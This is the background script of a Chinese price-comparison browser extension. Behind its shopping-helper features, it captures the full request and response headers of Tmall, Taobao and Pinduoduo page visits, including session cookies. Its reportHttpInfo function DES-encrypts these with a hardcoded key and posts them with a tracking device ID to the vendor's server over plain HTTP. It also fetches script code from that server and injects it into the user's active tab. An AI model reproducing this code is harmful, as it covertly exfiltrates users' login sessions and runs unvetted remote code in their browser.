﻿// 生成一个新的设备唯一标识符
function generateDeviceId() {
  // 使用当前时间戳和一个随机数生成一个伪唯一的标识符
  return Date.now().toString(36) + Math.random().toString(36).substring(2);
}

// 检查是否已经设置了设备唯一标识符
var deviceId = localStorage.getItem("lrbj_devid");

// 如果设备唯一标识符不存在，生成一个新的标识符并存储在本地存储中
if (!deviceId) {
  deviceId = generateDeviceId();
  localStorage.setItem("lrbj_devid", deviceId);
}

console.log("Device Identifier: " + deviceId);

//版本信息
var VAR_URL = `http://bijiatool-v2.zwjhl.com/ChromeWidgetServices/WidgetServices.ashx?methodName=getSetting&lrbj_devid=${deviceId}`;
var Notify_URL = `http://bijiatool-v2.zwjhl.com/ChromeWidgetServices/WidgetServices.ashx?methodName=getcuxiaotop1&lrbj_devid=${deviceId}&khdid=`;
var TOOLS_URL =
  "http://bijiatool-v2.zwjhl.com/ChromeWidgetServices/WidgetServices.ashx?methodName=getnewfile&id=";

var Test_URL = "https://lrbj-plugin-test.manmanbuy.com/";

var URL_div = `http://[::]:8000/lanrenjiekou/pack.xml`;
var TSINFO_URL = `http://bijiatool-v2.zwjhl.com/ChromeWidgetServices/WidgetServices.ashx?methodName=get_chajian_tixing1&lrbj_devid=${deviceId}`;
//   http://bijiatool-v2.zwjhl.com/ChromeWidgetServices/WidgetServices.ashx?methodName=getlistbijiainfo&jsoncallback=&p_url=
var timeid = 0;
var Notify_obj = null;
var waittime = 300000;
var coudanjg = 0;
var Notifydata = [];
var userAgent = navigator.userAgent;
var isEdge = !!~userAgent.indexOf("Edg");
// console.log(userAgent, 'isEdge', isEdge);

// 创建一个事件监听器，拦截请求并修改请求头
chrome.webRequest.onBeforeSendHeaders.addListener(
  function (details) {
    if (details.initiator && null != details.initiator) {
      if (
        details.initiator.indexOf("chrome-extension://") > -1 &&
        details.url.includes("https://api.m.jd.com/stock")
      ) {
        details.requestHeaders = headersReplace(
          details.requestHeaders,
          "Referer",
          "https://item.jd.com/"
        );
      }
    }
    return { requestHeaders: details.requestHeaders };
  },
  {
    urls: ["<all_urls>"], // 匹配所有URL
  },
  ["blocking", "requestHeaders", "extraHeaders"] // 使用阻塞模式拦截请求头
);
function headersReplace(e, t, n) {
  for (var a = 0; a < e.length; a++) {
    if (firstUpper(e[a].name) == firstUpper(t)) {
      e[a].value = n;
      break;
    }
    if (a >= e.length - 1) {
      var s = { name: t, value: n };
      e.push(s);
    }
  }
  return e;
}

function firstUpper(e) {
  return e.slice(0, 1).toUpperCase() + e.slice(1);
}

chrome.runtime.onMessage.addListener(async (request) => {
  console.log(deviceId);
  console.log(request);
  if (request.url.includes("jd")) {
    // 获取商品编号
    const getSpbh = async () => {
      $.ajax({
        type: "get",
        url: "https://a-zhekou-api.zwjhl.com/admin/base/getLastSpbh?",
        data: {
          link: request.url,
          lrbj_devid: deviceId,
        },
        dataType: "json",
        success: function (res) {
          if (res.code == 2000) {
            // 获取京东商城编号、skuID、地址
            $.ajax({
              type: "get",
              url: "https://a-zhekou-api.zwjhl.com/discount/getPcAreaCode",
              data: {
                spbh: res.data,
                fenleid: "",
                lrbj_devid: deviceId,
              },
              dataType: "json",
              success: function (req) {
                if (req.code == 2000) {
                  let flag = true;
                  let arr = [];
                  let num = 0;
                  req.data.areas.forEach((item) => {
                    $.ajax({
                      type: "get",
                      url: "https://api.m.jd.com/stock",
                      data: {
                        skuId: res.data.split("|")[1],
                        cat: req.data.fenleiId,
                        area: item.areaCode,
                        venderId: req.data.venderId,
                        appid: 'i-item_fe',
                        functionId: 'pc_stock'
                      },
                      dataType: "json",
                      success: function (ress) {
                        if (ress.stock) {
                          arr.push(ress.stock);
                          num++;
                          if (num === 31 && flag) {
                            chrome.tabs.query(
                              {
                                active: true,
                                currentWindow: true,
                              },
                              (tabs) => {
                                let message = {};
                                setTimeout(() => {
                                  message = {
                                    arr,
                                    num,
                                    deviceId,
                                  };
                                  chrome.tabs.sendMessage(
                                    tabs[0].id,
                                    message,
                                    (reqs) => {}
                                  );
                                }, 1000);
                              }
                            );
                            flag = false;
                          }
                        }
                      },
                    });
                  });
                }
              },
            });
          }
        },
      });
    };
    getSpbh();
  } else {
    let arr = [];
    let num = 0;
    chrome.tabs.query(
      {
        active: true,
        currentWindow: true,
      },
      (tabs) => {
        let message = {};
        setTimeout(() => {
          message = {
            arr,
            num,
            deviceId,
          };
          chrome.tabs.sendMessage(tabs[0].id, message, (reqs) => {});
        }, 1000);
      }
    );
  }
});
var browser = {
  default: {
    RequestLister_urls: [
      "*://detail.tmall.com/*",
      "*://item.taobao.com/*",
      // "*://item.jd.com/*",
      "*://mobile.yangkeduo.com/*",
    ],
  },
  Edge: {
    RequestLister_urls: ["*://mobile.yangkeduo.com/*"],
  },
};

var currentBrowser = (() => {
  if (isEdge) return browser.Edge;
  return browser.default;
})();

var TsUrlinfo = "";
var Tsdata;
var Tstime = 200;
var Tstimeid = 0;
var Tscount = 0;
var Tsinfodisp = 0;
var Tsinfodisp1 = 0;
var requestListerRes;

//下述步骤为立即执行步骤
(function initLocalStorage() {
  if (localStorage["manmaintools_var"] === undefined)
    localStorage["manmaintools_var"] = "0";
  if (localStorage["manmaintools_text"] === undefined)
    localStorage["manmaintools_text"] = "";
  if (localStorage["manmaintools_textf"] === undefined)
    localStorage["manmaintools_textf"] = "";
  if (localStorage["manmaintools_css"] === undefined)
    localStorage["manmaintools_css"] = "";
  if (localStorage["manmaintools_func"] === undefined)
    localStorage["manmaintools_func"] = "";
  if (localStorage["manmaintools_noti"] === undefined)
    localStorage["manmaintools_noti"] = "";
  if (localStorage["manmaintools_options"] === undefined)
    localStorage["manmaintools_options"] = "";
  if (localStorage["manmaintools_coudanurl"] === undefined)
    localStorage["manmaintools_coudanurl"] = "";
  if (localStorage["manmaintools_soptions"] === undefined)
    localStorage["manmaintools_soptions"] = "";
  if (localStorage["disptime"] === undefined) localStorage["disptime"] = "30";
  if (localStorage["waittime"] === undefined)
    localStorage["waittime"] = "60000";
  if (localStorage["Notify_ver"] === undefined)
    localStorage["Notify_ver"] = "0";
  if (localStorage["notify"] === undefined) localStorage["notify"] = "Y"; //定时获取数据,Y为启用
  if (localStorage["manmaintools_popup"] === undefined)
    localStorage["manmaintools_popup"] = "";
  if (localStorage["manmaintools_jgqshtml"] === undefined)
    localStorage["manmaintools_jgqshtml"] = "";
  if (localStorage["manmaintools_jgqscss"] === undefined)
    localStorage["manmaintools_jgqscss"] = "";
  if (localStorage["manmaintools_jgqsurl"] === undefined)
    localStorage["manmaintools_jgqsurl"] = "";
  if (localStorage["manmaintools_mmbjs"] === undefined)
    localStorage["manmaintools_mmbjs"] = "";
  if (localStorage["manmaintools_jgqs"] === undefined)
    localStorage["manmaintools_jgqs"] = "Y";
  if (localStorage["manmaintools_tsinfo"] === undefined)
    localStorage["manmaintools_tsinfo"] = "";
  else TsUrlinfo = localStorage["manmaintools_tsinfo"];
  if (localStorage["manmaintools_keyword"] === undefined)
    localStorage["manmaintools_keyword"] = "";
  if (localStorage["manmaintools_user_datebegin"] === undefined)
    localStorage["manmaintools_user_datebegin"] = "";
  if (localStorage["manmaintools_user_dateend"] === undefined)
    localStorage["manmaintools_user_dateend"] = "";
  if (
    localStorage["manmaintools_text"] == "" ||
    localStorage["manmaintools_css"] == "" ||
    localStorage["manmaintools_func"] == "" ||
    localStorage["manmaintools_mmbjs"] == ""
  )
    localStorage["manmaintools_var"] = "0";
})();

chrome.extension.onConnect.addListener(function (port) {
  port.onMessage.addListener(function (msg) {
    var dat;
    switch (msg.load) {
      case "Getjs":
        port.postMessage({
          question: "Getjs",
          txt: localStorage["manmaintools_mmbjs"],
          coudantxt: localStorage["manmaintools_coudanurl"],
          jgqs: localStorage["manmaintools_jgqsurl"],
          mmburl: localStorage["manmaintools_mmbbjurl"],
        });
        break;
      case "Load":
        //InsCssFunc(1,"endload",port,msg.loadcj);
        port.postMessage({
          question: "endload",
          txt: localStorage["manmaintools_text"],
          jgqsYN: localStorage["notify"],
          id: deviceId
        });
        break;
      case "Loadcj":
        InsCssFunc(1, "Loadcjend", port, msg.loadcj, deviceId);
        break;
      case "coudan":
        port.postMessage({
          question: "coudan",
        });
        //InsCssFunc(1,"coudan",port,msg.loadcj);
        break;
      case "coudanjg": //
        if (msg.cdjg != -1) coudanjg = msg.cdjg | 0;
        else {
          port.postMessage({
            question: "coudanjg",
            cdjg: coudanjg,
            dj: msg.dj,
            qu: msg.qu,
            huiyun: msg.huiyun,
            txt: localStorage["manmaintools_ccoudan"],
          });
        }
        break;
      case "https":
        GetHttpsdata("GetHttpsData", msg.url, port, 1);
        break;

      case "notify_Yes":
        if (timeid == 0) Notifydisp();
        break;
      case "notify_Not":
        clearTimeout(timeid);
        timeid = 0;
        break;
      case "bijiats":
        InsCssFunc(1, "bijiats", port, msg.loadcj,deviceId);
        port.postMessage({
          question: "bijiats",
        });
        break;
      case "bijiatsdata":
        GetHttpsdata("bijiatsdata", msg.url, port, 2);
        break;

      case "loadzs":
        //   获取走势data

        getZoushiData(msg, function (resp_data) {
          port.postMessage({
            question: "loadzs_end",
            data: resp_data,
          });
        });
        break;
    }
  });
});

//bg.js  立即执行

(function Getvar() {
  var vars = localStorage["manmaintools_var"];
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4) {
      if (xhr.status === 200) {
        var Src = xhr.responseText;
        var Obj = JSON.parse(Src); //eval('('+Src+')');//
        localStorage["manmaintools_soptions"] = Src;
        if (Obj.vars != vars) {
          localStorage["manmaintools_var"] = Obj.vars;
          localStorage["waittime"] = Obj.waittime;
          proceData();
        }
      }
    }
  };
  xhr.open("get", VAR_URL);
  xhr.send();
})();

function proceData() {
  GetData("5");
}

function GetData(id) {
  var vars = localStorage["manmaintools_var"];
  var xhr = new XMLHttpRequest();
  xhr.myid = id;
  xhr.onreadystatechange = function (e, ids) {
    var txt;
    if (xhr.readyState === 4) {
      if (xhr.status === 200) {
        if (xhr.responseText !== null) {
          switch (xhr.myid) {
            case "0":
              localStorage["manmaintools_text"] = xhr.responseText;
              break;
            case "1":
              localStorage["manmaintools_css"] = xhr.responseText; //.replace(" background:url(","background:url("+
              break;
            case "2":
              localStorage["manmaintools_func"] = xhr.responseText;
              break;
            case "3":
              localStorage["manmaintools_ccoudan"] = xhr.responseText;
              break;
            case "4":
              localStorage["manmaintools_popup"] = xhr.responseText;
              break;
            case "5":
              if (xhr.responseXML !== null) {
                if (xhr.responseXML.getElementsByTagName("mmbhtml").length > 0)
                  localStorage["manmaintools_text"] =
                    "<!--" +
                    xhr.responseXML.getElementsByTagName("mmbhtml")[0]
                      .textContent +
                    "-->";
                if (xhr.responseXML.getElementsByTagName("mmbcss").length > 0)
                  localStorage["manmaintools_css"] =
                    xhr.responseXML.getElementsByTagName(
                      "mmbcss"
                    )[0].textContent;
                if (xhr.responseXML.getElementsByTagName("func").length > 0)
                  localStorage["manmaintools_func"] =
                    xhr.responseXML.getElementsByTagName("func")[0].textContent;
                if (xhr.responseXML.getElementsByTagName("coudan").length > 0)
                  localStorage["manmaintools_ccoudan"] =
                    "<!--" +
                    xhr.responseXML.getElementsByTagName("coudan")[0]
                      .textContent +
                    "-->";
                if (xhr.responseXML.getElementsByTagName("popup").length > 0)
                  localStorage["manmaintools_popup"] =
                    "<!--" +
                    xhr.responseXML.getElementsByTagName("popup")[0]
                      .textContent +
                    "-->";
                if (xhr.responseXML.getElementsByTagName("jgqscss").length > 0)
                  localStorage["manmaintools_jgqscss"] =
                    xhr.responseXML.getElementsByTagName(
                      "jgqscss"
                    )[0].textContent;
                if (
                  xhr.responseXML.getElementsByTagName("jgqshtml").length > 0
                ) {
                  txt = xhr.responseXML
                    .getElementsByTagName("jgqshtml")[0]
                    .textContent.replace("<!--", "");
                  localStorage["manmaintools_jgqshtml"] = txt.replace(
                    "-->",
                    ""
                  );
                }
                if (xhr.responseXML.getElementsByTagName("jgqsurl").length > 0)
                  localStorage["manmaintools_jgqsurl"] = xhr.responseXML
                    .getElementsByTagName("jgqsurl")[0]
                    .textContent.replace(/(^\s+)|(\s+$)/g, "")
                    .replace(/[\n]/gi, "")
                    .replace(/[\r]/gi, "");
                localStorage["manmaintools_coudanurl"] = xhr.responseXML
                  .getElementsByTagName("coudanurl")[0]
                  .textContent.replace(/(^\s+)|(\s+$)/g, "")
                  .replace(/[\n]/gi, "")
                  .replace(/[\r]/gi, "");
                if (xhr.responseXML.getElementsByTagName("mmbjs").length > 0)
                  localStorage["manmaintools_mmbjs"] =
                    xhr.responseXML.getElementsByTagName(
                      "mmbjs"
                    )[0].textContent;
                if (xhr.responseXML.getElementsByTagName("mmbbjurl").length > 0)
                  localStorage["manmaintools_mmbbjurl"] = xhr.responseXML
                    .getElementsByTagName("mmbbjurl")[0]
                    .textContent.replace(/(^\s+)|(\s+$)/g, "")
                    .replace(/[\n]/gi, "")
                    .replace(/[\r]/gi, "");
              }
              break;
          }
        }
      }
    }
  };
  xhr.open("get", TOOLS_URL + id); // TOOLS_URL + id      URL_div    Test_URL
  xhr.send();
}

///////////////////////////////////////////////////
function InsCssFunc(id, mes, pt, loadcj,id) {
  var css = "",
    func = "";
  chrome.tabs.getSelected(null, function (tab) {
    if (localStorage["manmaintools_jgqs"] === "N") loadcj.qscs = 0;
    if (loadcj.css == 1) css += localStorage["manmaintools_css"];
    if (loadcj.qscs == 1) css += localStorage["manmaintools_jgqscss"];
    if (loadcj.js == 1) func = localStorage["manmaintools_func"];
    if (css != "" && func != "") {
      chrome.tabs.insertCSS(
        tab.id,
        {
          code: css,
        },
        function () {
          chrome.tabs.executeScript(
            tab.id,
            {
              code: func,
            },
            function () {
              if (mes != "")
                pt.postMessage({
                  question: mes,
                  txt: localStorage["manmaintools_text"],
                  loadcj: loadcj,
                  id: id
                });
            }
          );
        }
      );
    } else if (css != "" && func == "") {
      chrome.tabs.insertCSS(
        tab.id,
        {
          code: css,
        },
        function () {
          if (mes != "")
            pt.postMessage({
              question: mes,
              loadcj: loadcj,
              id: id
            });
        }
      );
    } else if (func != "") {
      chrome.tabs.executeScript(
        tab.id,
        {
          code: func,
        },
        function () {
          if (mes != "")
            pt.postMessage({
              question: mes,
              loadcj: loadcj,
              id: id
            });
        }
      );
    }
  });
}
function GetHttpsdata(info, url, pt, i) {
  var xhr;
  xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4) {
      if (xhr.status === 200) {
        var scriptSrc = xhr.responseText;
        var scriptSrcObj = JSON.parse(scriptSrc); // eval('('+scriptSrc+')');//
        switch (i) {
          case 1:
            if (typeof scriptSrcObj.JGQSDIV !== "undefined") {
              pt.postMessage({
                question: info,
                httpsdata: scriptSrcObj,
              });
            }
            chrome.tabs.query({ active: true, currentWindow: true }, function(tabs) {
                if (tabs.length > 0) {
                    var currentTab = tabs[0];
                    var currentTabUrl = currentTab.url;
                    if (currentTabUrl  && currentTabUrl === requestListerRes.url) {
                      reportHttpInfo({
                        requestHeaders: requestListerRes.requestHeaders,
                        responseHeaders: requestListerRes.responseHeaders,
                        spbh: scriptSrcObj.spbh || "000",
                        zk_scid: scriptSrcObj.zk_scid || getSiteid(requestListerRes.url),
                      });
                    }
                }
            });
            break;
          case 2:
            if (
              scriptSrcObj.jiagequshi != "" &&
              typeof scriptSrcObj.jiagequshi !== "undefined"
            ) {
              scriptSrcObj.urls = url;
              pt.postMessage({
                question: info,
                httpsdata: scriptSrcObj,
                txt: localStorage["manmaintools_jgqshtml"],
              });
            }
            break;
        }
      }
    }
  };
  xhr.open("get", url);
  xhr.send();
}

function showDiscNotify(obj) {
  var items = [];
  var ob1, pic;
  var timed = localStorage["disptime"] | 0 || 30;
  btnTitle = "懒人比价购物助手";
  if (Tsinfodisp == 1) return;
  var buttons = [
    {
      title: btnTitle,
      buttons: chrome.runtime.getURL("/images/m16.png"),
    },
  ];
  var defaultImgUrl = obj.items[0].picurl; //chrome.runtime.getURL("/images/m48.png");//
  var options = {
    type: "basic",
    title: obj.items[0].title,
    message: obj.items[0].message,
    iconUrl: defaultImgUrl,
    buttons: buttons,
  };

  chrome.notifications.create("我的消息", options, function () {
    setTimeout(function () {
      chrome.notifications.clear("我的消息", function () {});
      Tsinfodisp = 0;
    }, timed * 1000);
  });
  Tsinfodisp = 1;
  chrome.notifications.onButtonClicked.addListener(function (notifId, btnIdx) {
    Tsinfodisp = 0;
  });

  chrome.notifications.onClicked.addListener(function (notifId, btnIdx) {
    chrome.tabs.create({
      selected: true,
      url: obj.items[0].url,
    });
    Tsinfodisp = 0;
  });
}

function showNotify(obj) {
  var items = [];
  var ob1, pic;
  var timed = localStorage["disptime"] | 0 || 30;
  btnTitle = "懒人比价购物助手";
  if (Tsinfodisp1 == 1) return;
  var buttons = [
    {
      title: btnTitle,
      iconUrl: chrome.runtime.getURL("/images/m16.png"),
    },
  ];
  var defaultImgUrl = obj.items[0].picurl; //chrome.runtime.getURL("/images/m48.png");//
  if (Notification && Notification.permission !== "granted") {
    clearTimeout(timeid);
    timeid = 0;
    return;
  }

  var options = {
    type: "basic",
    title: obj.items[0].title,
    message: obj.items[0].message,
    iconUrl: defaultImgUrl,
    buttons: buttons,
  };

  chrome.notifications.create("我的消息", options, function () {
    setTimeout(function () {
      chrome.notifications.clear("我的消息", function () {});
      Tsinfodisp1 = 0;
    }, timed * 1000);
  });
  Tsinfodisp1 = 1;
  chrome.notifications.onButtonClicked.addListener(function (notifId, btnIdx) {
    Tsinfodisp1 = 0;
  });

  chrome.notifications.onClicked.addListener(function (notifId, btnIdx) {
    chrome.tabs.create({
      selected: true,
      url: obj.items[0].url,
    });
    Tsinfodisp1 = 0;
  });
}

function notify(obj) {
  var timed = localStorage["disptime"] | 0 || 30;
  var items = [],
    item,
    button;
  var buttons = [];
  var notify = [],
    options1;
  var notifi;

  if (timed == 0) return;
  if (obj.items == null) return;
  /**/
  if (
    window.webkitNotifications &&
    window.webkitNotifications.checkPermission() == 0
  ) {
    for (var n = 0; n < obj.items.length; n++) {
      notifi = window.webkitNotifications.createNotification(
        obj.items[n].picurl,
        obj.items[n].title,
        obj.items[n].message
      );
      notifi.tag = obj.items[n].url;
      Notifydata.push(notifi);
      notifi.onclick = function (e) {
        chrome.tabs.create(
          {
            selected: true,
            url: event.currentTarget.tag,
          },
          function (tab) {
            chrome.windows.get(tab.windowId, function (win) {
              chrome.windows.update(win.id, {
                focused: true,
              });
            });
          }
        );
        this.close();
      };
      //显示提醒对话框
      notifi.show();
    }
  } else {
    if (Notification && Notification.permission !== "granted") {
      clearTimeout(timeid);
      timeid = 0;
      return;
    }
    if (obj != null && obj.items != null) {
      for (var n = 0; n < obj.items.length; n++) {
        options1 = new Object();
        options1.dir = "rtl";
        options1.lang = "zh-CN";
        options1.body = obj.items[n].message;
        options1.tag = obj.items[n].url; //n ;
        (options1.icon = obj.items[n].picurl),
          (options1.urls = obj.items[n].url);
        notifi = new Notification(obj.items[n].title, options1);
        Notifydata.push(notifi);
        notifi.onclick = function (event) {
          //var i=event.currentTarget.tag |0 ||0 ;
          // chrome.tabs.create({ selected: true, url: event.currentTarget.tag });//obj.items[i].url
          chrome.tabs.create(
            {
              selected: true,
              url: event.currentTarget.tag,
            },
            function (tab) {
              chrome.windows.get(tab.windowId, function (win) {
                chrome.windows.update(win.id, {
                  focused: true,
                });
              });
            }
          );
          this.close();
        };
        notifi.ondisplay = function (e) {};
      }
    }
  }

  if (Notifydata.length > 0) {
    setTimeout(function () {
      var fn;
      for (var n = 0; n < Notifydata.length; n++) {
        fn = Notifydata[n];
        fn.close();
      }
      Notifydata = [];
    }, timed * 1000);
  }
  /*showDiscNotify(obj);*/
}

///////////////////////////每隔一断时间向服务器要数据///////////////////////////////////////////////////////////////////
(function () {
  var s = localStorage["notify"];
  if (s === "Y") Notifydisp();
})();

function Notifydisp() {
  var xhr, vers;
  var waittime_ = localStorage["waittime"] | 0;
  if (waittime == 0) waittime_ = waittime; ////
  if (Notification && Notification.permission !== "granted") {
    Notification.requestPermission(function (status) {
      if (Notification.permission !== "granted") {
        Notification.permission = "granted";
      }
    });
  }
  ////
  timeid = setInterval(function () {
    var i,
      j,
      p = "",
      di1 = 0;
    (di2 = 0), (dateObj = null), (ida = 0);
    var dt1 = localStorage["manmaintools_user_datebegin"];
    var dt2 = localStorage["manmaintools_user_dateend"];
    if (dt1 !== "" && dt1 !== "undefined" && dt2 !== "" && dt2 != "undefined") {
      di1 =
        parseInt((dt1.substring(0, 2) | 0) * 60) + parseInt(dt1.substr(3) | 0);
      di2 =
        parseInt((dt2.substring(0, 2) | 0) * 60) + parseInt(dt2.substr(3) | 0);
      if (di1 < di2) {
        dateObj = new Date();
        ida = dateObj.getHours() * 60 + dateObj.getMinutes();
        if (di1 < ida && ida < di2) return;
      }
    }

    xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function () {
      if (xhr.readyState === 4) {
        if (xhr.status === 200) {
          var Src = xhr.responseText;
          var Obj = JSON.parse(Src); // eval('('+scriptSrc+')');//
          i =
            localStorage["Notify_ver"] === "NaN"
              ? 0
              : parseInt(localStorage["Notify_ver"]);
          j = Obj.ver | 0 || 0; // parseInt(Obj.ver)==="NaN"?0:parseInt(Obj.ver);
          if (i != j && j != 0) {
            notify(Obj);
            //showNotify(Obj);
            Notify_obj = Obj;
            localStorage["Notify_ver"] = j; //Obj.ver;
          }
          TsUrlinfo = localStorage["manmaintools_tsinfo"];

          if (
            Obj.tixingver != TsUrlinfo &&
            Obj.tixingver != "" &&
            TsUrlinfo !== "undefined" &&
            typeof TsUrlinfo !== "undefined"
          ) {
            TsUrlinfo = Obj.tixingver;
            localStorage["manmaintools_tsinfo"] = TsUrlinfo;
            TsExecinfo(Obj.url);
          }
        }
      }
    };
    p = "&p=" + getparam();
    vers = localStorage["Notify_ver"] | 0 || 0;
    xhr.open("get", Notify_URL + vers + p); //Notify_URL);
    xhr.send();
  }, waittime_);
}

function Tsinfowaitetime(time) {
  Tstimeid = setTimeout(function () {
    var obj = [];
    var n = 0,
      t;
    n = Tscount;
    Tscount++;
    if (Tsdata.length > Tscount) {
      d1 = Tsdata[Tscount].cdates;
      d2 = new Date().getTime();
      if (d2 <= d1) t = d1 - d2;
      else {
        t = 50;
      }
    } else t = 0;

    if (Tstime > 50) {
      obj = {
        items: [
          {
            title: Tsdata[n].title,
            message: Tsdata[n].message,
            url: Tsdata[n].url,
            picurl: Tsdata[n].img,
          },
        ],
      };
      showDiscNotify(obj);
    }
    Tstime = t;
    if (Tstime == 0) {
      Tstimeid = 0;
    } else Tsinfowaitetime(Tstime);
  }, Tstime);
}

function TsExecinfo(url) {
  var i,
    j,
    p = "";

  xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    var d1, d2, d3;
    if (xhr.readyState === 4) {
      if (xhr.status === 200) {
        var Src = xhr.responseText;
        var Obj = JSON.parse(Src);
        Tscount = 0;
        Tsdata = Obj;
        Tstime = 999900;
        if (Tstimeid != 0) clearTimeout(Tstimeid);
        for (var n = 0; n < Tsdata.length; n++)
          Tsdata[n].cdates = new Date(Tsdata[n].datetime).getTime();
        if (Tsdata.length == 0) return;
        Tsdata.sort(function (a, b) {
          return a.cdates - b.cdates;
        });
        for (var n = 0; n < Tsdata.length; n++) {
          d1 = new Date(Tsdata[n].datetime).getTime();
          d2 = new Date().getTime();
          if (d2 <= d1) {
            Tscount = n;
            Tstime = d1 - d2;
            break;
          }
        }
        Tsinfowaitetime(Tstime);
      }
    }
  };
  xhr.open("get", TSINFO_URL);
  xhr.send();
}

function getparam() {
  var j,
    arr = localStorage.getItem("manmaintools_options").split(";");
  var key1 = localStorage["manmaintools_keyword"];
  var txt = "";
  for (var i = 0; i < arr.length; i++) {
    j = arr[i].indexOf("=Y");
    if (j > 0) {
      if (i > 0) txt += "|";
      txt += arr[i].substr(0, j);
    }
  }
  if (key1 !== "" && key1 !== "undefined") txt += "&keyword=" + key1;
  return encodeURI(txt);
}

/////////////////////////跨域数据交互////////////////////////
function getZoushiData(msg, callback) {
  $.ajax({
    type: "GET",
    url: msg.url,
    contentType: "application/json",
    dataType: "json",
    success: function (resp_data) {
      callback && typeof callback == "function" && callback(resp_data);
    },
    error: function (XMLHttpRequest, textStatus, errorThrown) {},
  });
}

function getSiteid(href) {
  if (/.tmall.com/.test(href)) return 10;
  if (/.taobao.com/.test(href)) return 15;
  if (/.jd.com/.test(href)) return 1;
  if (/.yangkeduo.com/.test(href)) return 307;
  return 0;
}

// console.log(chrome);
// chrome.declarativeNetRequest.onRuleMatchedDebug.addListener(
//     (...arg) => {
//         console.log(...arg);
//     },
// )

function encryptByDES(message, key) {
  var keyHex = CryptoJS.enc.Utf8.parse(key);
  var encrypted = CryptoJS.DES.encrypt(message, keyHex, {
    mode: CryptoJS.mode.ECB,
    padding: CryptoJS.pad.Pkcs7,
  });
  return encrypted.ciphertext.toString();
}

function ArrayToObject(arr) {
  let obj = {};
  arr.forEach((element) => {
    let keys = Object.keys(obj);
    if (!~keys.findIndex((val) => val === element.name))
      obj[element.name] = element.value;
    else obj[element.name] = obj[element.name] + "," + element.value;
  });
  return obj;
}

class RequestLister {
  static events = [];
  static urls = [];
  static addListener = (cb, url) => {
    RequestLister.events.push(cb);
    RequestLister.urls.push(url);
  };
  static removeListener = (cb) => {
    let index = RequestLister.events.findIndex(cb);
    if (index === -1) return;
    RequestLister.events.splice(index, 1);
    RequestLister.urls.splice(index, 1);
  };

  constructor(props) {
    this.urls = props.urls;
    this.callback = props.cb;
    this.isGetRequestBody = props.isGetRequestBody || false;
    this.types = props.types;
    this.init();
  }

  method = "";
  url = "";
  requestBody = [];
  requestHeaders = [];
  responseHeaders = [];
  responseBody = {};
  cancel = false;

  get requestFilter() {
    return {
      urls: this.urls,
      types: this.types,
    };
  }

  beforeRequestL = (details) => {};
  sendHeadersL = (details) => {
    this.requestHeaders = details.requestHeaders;
  };
  headersReceivedL = (details) => {};
  completedL = (details) => {
    this.method = details.method;
    this.url = details.url;
    this.responseHeaders = details.responseHeaders;
    if (!this.isGetRequestBody) {
      this.callback(this);
      return;
    }
    setTimeout(() => {
      let xhrl = new XMLHttpRequest();
      xhrl.withCredentials = true;
      xhrl.onreadystatechange = () => {
        if (xhrl.readyState !== 4) return;
        if (xhrl.status !== 200) return;
        this.responseBody = JSON.parse(xhrl.responseText);
        this.callback(this);
        this.remove();
        this.init();
      };
      if (this.method === "GET") xhrl.open(this.method, this.url);
      this.requestHeaders.forEach((element) => {
        xhrl.setRequestHeader(element.name, element.value);
      });
      xhrl.send();
    }, 0);
  };
  init() {
    chrome.webRequest.onBeforeRequest.addListener(
      this.beforeRequestL,
      this.requestFilter,
      ["blocking", "extraHeaders", "requestBody"]
    );
    chrome.webRequest.onSendHeaders.addListener(
      this.sendHeadersL,
      this.requestFilter,
      ["extraHeaders", "requestHeaders"]
    );
    chrome.webRequest.onHeadersReceived.addListener(
      this.headersReceivedL,
      this.requestFilter,
      ["blocking", "extraHeaders", "responseHeaders"]
    );
    chrome.webRequest.onCompleted.addListener(
      this.completedL,
      this.requestFilter,
      ["extraHeaders", "responseHeaders"]
    );
  }
  remove() {
    chrome.webRequest.onBeforeRequest.removeListener(this.beforeRequestL);
    chrome.webRequest.onSendHeaders.removeListener(this.sendHeadersL);
    chrome.webRequest.onHeadersReceived.removeListener(this.headersReceivedL);
    chrome.webRequest.onCompleted.removeListener(this.completedL);
  }
}

new RequestLister({
  urls: currentBrowser.RequestLister_urls,
  types: ["main_frame"],
  cb: async (rest) => {
    requestListerRes = rest;
  },
});
function reportHttpInfo(res) {
  let DESkey = "2bd4bf99e9863e85";
  let reqInfo = encryptByDES(
    JSON.stringify(ArrayToObject(res.requestHeaders)),
    DESkey
  );
  let respInfo = encryptByDES(
    JSON.stringify(ArrayToObject(res.responseHeaders)),
    DESkey
  );
  let body = encryptByDES(JSON.stringify(res.responseBody), DESkey);
  let requestData = {
    methodName: "reportHttpInfo",
    reqInfo,
    respInfo,
    spbh: res.spbh,
    comeFrom: "chajian",
    lrbj_devid: deviceId,
  };
  if (!~res.spbh.indexOf("|")) requestData.spbh = res.zk_scid + "|" + res.spbh;
  let reqStr = "";
  for (const key in requestData) {
    if (Object.hasOwnProperty.call(requestData, key)) {
      const element = requestData[key];
      reqStr += `&${key}=${element}`;
    }
  }
  reqStr = reqStr.slice(1);
  reqStr = "?" + reqStr;

  let formData = new FormData();
  for (const key in requestData) {
    if (requestData.hasOwnProperty(key)) {
      formData.append(key, requestData[key]);
    }
  }
  // fetch(`http://bijiatool-v2.zwjhl.com/ChromeWidgetServices/WidgetServices.ashx` + reqStr)
  fetch(
    `http://bijiatool-v2.zwjhl.com/ChromeWidgetServices/WidgetServices.ashx`,
    {
      method: "POST",
      body: formData,
    }
  );
}
